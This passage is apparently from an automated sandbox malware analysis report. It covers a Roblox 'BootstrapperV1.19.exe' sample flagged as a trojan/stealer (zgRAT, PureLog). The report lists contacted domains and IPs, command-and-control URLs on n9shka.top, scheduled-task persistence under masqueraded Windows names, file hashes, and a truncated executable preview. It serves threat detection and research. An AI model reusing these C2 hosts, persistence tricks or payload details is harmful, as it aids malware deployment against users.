                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.newtonsoft.com/jsonschemaBootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/zzzprojects/html-agility-pack/issues/513BootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://getsolara.dev/SuspectedBootstrapperV1.19.exetrue
                                      • 11%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://getsolara.dev/XBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmptrue
                                      • 11%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonBootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aka.ms/pscore68powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://clientsettings.roblox.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://pastebin.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE737000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://pastebin.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettings.roblox.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.cBootstrapperV1.19.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.203.125
                                      getsolara.devUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.20.3.235
                                      pastebin.comUnited States
                                      13335CLOUDFLARENETUStrue
                                      128.116.123.4
                                      edge-term4-fra2.roblox.comUnited States
                                      22697ROBLOX-PRODUCTIONUSfalse
                                      80.211.144.156
                                      598828cm.n9shka.topItaly
                                      31034ARUBA-ASNITtrue
                                      104.20.23.46
                                      www.nodejs.orgUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1511213
                                      Start date and time:2024-09-14 12:51:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 12m 58s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:82
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:BootstrapperV1.19.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@86/345@5/6
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 74%
                                      • Number of executed functions: 320
                                      • Number of non-executed functions: 74
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, RuntimeBroker.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target BootstrapperV1.19.exe, PID 7152 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      06:52:04API Interceptor77x Sleep call for process: BootstrapperV1.19.exe modified
                                      06:52:27API Interceptor1x Sleep call for process: WerFault.exe modified
                                      06:52:41API Interceptor345x Sleep call for process: powershell.exe modified
                                      06:53:04API Interceptor257996x Sleep call for process: xMWILCHEwdBVCAxxjofRRL.exe modified
                                      11:52:36Task SchedulerRun new task: PerfNET path: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe"
                                      11:52:37Task SchedulerRun new task: PerfNETP path: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe"
                                      11:52:38Task SchedulerRun new task: RuntimeBroker path: "C:\Users\Default\AppData\RuntimeBroker.exe"
                                      11:52:39Task SchedulerRun new task: RuntimeBrokerR path: "C:\Users\Default\AppData\RuntimeBroker.exe"
                                      11:52:39Task SchedulerRun new task: SIHClient path: "C:\Windows\ELAMBKUP\SIHClient.exe"
                                      11:52:40Task SchedulerRun new task: SIHClientS path: "C:\Windows\ELAMBKUP\SIHClient.exe"
                                      11:52:40Task SchedulerRun new task: xMWILCHEwdBVCAxxjofRRL path: "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                      11:52:40Task SchedulerRun new task: xMWILCHEwdBVCAxxjofRRLx path: "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      172.67.203.125RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                            104.20.3.235SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            128.116.123.4SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                              https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                  Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                    80.211.144.156eRZQCpMb4y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 292192cl.nyashtop.top/providerimagePollsecureupdateWordpressdatalifePrivateTemporary.php
                                                    4BJoBHQ6T3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 696969cm.n9shka.top/vm_httpUpdateAuthsqlWp.php
                                                    oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 380681cm.n9shka.top/PipejavascriptlowGameapibigloadFlowertempCentraltemporary.php
                                                    kIdT4m0aa4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 304550cm.n9shka.top/jspollgamesqldle.php
                                                    7buiOqC9uM.exeGet hashmaliciousDCRatBrowse
                                                    • 545735cm.n9shteam2.top/PhpgeoupdateprocessorsqlTemporary.php
                                                    5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 917166cm.n9shka.top/eternalJavascriptSecureCpuBigloadserverDefaultlinuxwordpress.php
                                                    YhyZwI1Upd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • gugol.top/PipeCpuauthgameDefault.php
                                                    6KZExx4zr6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • moscowteslaclub.top/LinemultiLinux.php
                                                    U22myB552e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 692143cm.n9shka.top/VideoPythonphpsecureprocessorwindowsDleTemporary.php
                                                    active key.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.nodejs.orgRHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 104.20.22.46
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 104.20.23.46
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 104.20.23.46
                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                    • 104.20.22.46
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 104.20.23.46
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 104.20.22.46
                                                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                                    • 104.20.23.46
                                                    3jF5V4T8LO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 104.20.22.46
                                                    getsolara.devRHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 172.67.203.125
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.93.27
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.93.27
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.93.27
                                                    pastebin.comclient.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                    • 104.20.3.235
                                                    GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
                                                    • 104.20.3.235
                                                    bdsBbxwPyV.ena.dllGet hashmaliciousUnknownBrowse
                                                    • 104.20.3.235
                                                    fblXRRCHON.pos.dllGet hashmaliciousUnknownBrowse
                                                    • 104.20.4.235
                                                    GmsiIZXruf.hos.dllGet hashmaliciousUnknownBrowse
                                                    • 104.20.3.235
                                                    file.exeGet hashmaliciousXWormBrowse
                                                    • 172.67.19.24
                                                    file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                                                    • 104.20.4.235
                                                    file.exeGet hashmaliciousDarkTortillaBrowse
                                                    • 104.20.3.235
                                                    file.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                    • 104.20.3.235
                                                    RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 104.20.4.235
                                                    edge-term4-fra2.roblox.comSecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.3
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.3
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.4
                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.3
                                                    SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                    • 128.116.123.3
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ROBLOX-PRODUCTIONUSRHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 128.116.21.3
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.3
                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.3
                                                    https://roblox.tz/games/10449761463/BOSS-The-Strongest-Battlegrounds?privateServerLinkCode=11856892146830167735895077236647Get hashmaliciousUnknownBrowse
                                                    • 128.116.44.4
                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.44.3
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.4
                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                    • 128.116.21.4
                                                    https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                    • 128.116.119.4
                                                    https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                    • 128.116.123.4
                                                    cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                    • 128.116.21.4
                                                    ARUBA-ASNIThttp://fotoclubsanmartino.itGet hashmaliciousUnknownBrowse
                                                    • 62.149.128.45
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.221
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.221
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.221
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.221
                                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                    • 80.88.87.245
                                                    eRZQCpMb4y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 80.211.144.156
                                                    4BJoBHQ6T3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 80.211.144.156
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.245
                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 80.88.87.245
                                                    CLOUDFLARENETUSLoader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                    • 104.21.85.189
                                                    sntmr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.136.135
                                                    setup3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, SmokeLoaderBrowse
                                                    • 172.67.136.135
                                                    vfdjg.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.136.135
                                                    https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    66e40b2e8a52e_lfsdj.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.38.33
                                                    app__v6.20.5_.msiGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    WorldWars Setup.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                    • 172.67.196.114
                                                    CLOUDFLARENETUSLoader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                    • 104.21.85.189
                                                    sntmr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.136.135
                                                    setup3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, SmokeLoaderBrowse
                                                    • 172.67.136.135
                                                    vfdjg.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    • 172.67.136.135
                                                    https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    66e40b2e8a52e_lfsdj.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.38.33
                                                    app__v6.20.5_.msiGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    WorldWars Setup.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                    • 172.67.196.114
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0efinal_payload.bin.exeGet hashmaliciousXWormBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    Loader.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%7A%6F%71%7A%71%2E%6F%72%67%2F%61%74%74%2F%61%74%74%2FLZH2gvcseOdSTVo1rdoVRIuO/amZhbGNrZUBraWxjb3lnbG9iYWxmb29kcy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    https://procoinbaselogin.iwopop.com/Get hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    http://hamouda0-t3-zabi.blogspot.com.es/Get hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    http://metasamsk-uswallt.gitbook.io/Get hashmaliciousUnknownBrowse
                                                    • 172.67.203.125
                                                    • 104.20.3.235
                                                    • 128.116.123.4
                                                    • 104.20.23.46
                                                    No context
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (460), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):460
                                                    Entropy (8bit):5.8264948274813815
                                                    Encrypted:false
                                                    SSDEEP:12:kJ5xHQlYS7GLpLofSl3/9+MMUnH+174E8hFsK:k3xzDLFof6MMM3UE8hv
                                                    MD5:74D227E3D912A57BD18DE1D618C892EE
                                                    SHA1:D98F42681813DAE3010EC5F2BAB4FF934C9F8104
                                                    SHA-256:AC8A0000205896849C8063E7ED9A36181B6BDE0136DDEBC822460AD1A785279F
                                                    SHA-512:827940779E797D7A9A58583FF09DF78CD6D09017290A9D21815881F260A2025C221903F6635F0DD5C1FF700847EC7E81EFE1B26784A393A3FB479C762365E9CC
                                                    Malicious:false
                                                    Preview:9p1uFlWERuikSqeDF4Dg1djduIdwuHMbzQwFqQ9YkuY2CjN81CaYIikfGY96HjTJhGuC3ZXy4p6GFrbL5f5rqySRpQ8RQDQAaOU5yKEcomedleaZ7yBmomctydXmaGi1Y5p0XfWuacCEUzpK0jTbBoWywkHVxbBiDnEqykCbcRLLjXZ8xMw1wGzui0DwYB68beBqv9WPh19udLPZLIhlpKw7xUH7gPDaUMuFWsNy0gT4GFRXlolPdUTQrD2b1YtRyiZQbKDc5svI010sCuW2oy792dXSzw7bxBGhpA5blJTvjLa0MKYHC1n9lZX8wumJvTUzvTDCy4QfeMarCgFpX0Z6XG5Qm7o0gKAQ0lF3HVSHkIfZ9q5Pp7v43XboXwZ0QZ8TLK0bbLiBhSWPkgR6CYLjYFWcKagU6c1KJLNyzdydYtXkBLD1fdy1OZ5GxXRApNFEbLFZScGi
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
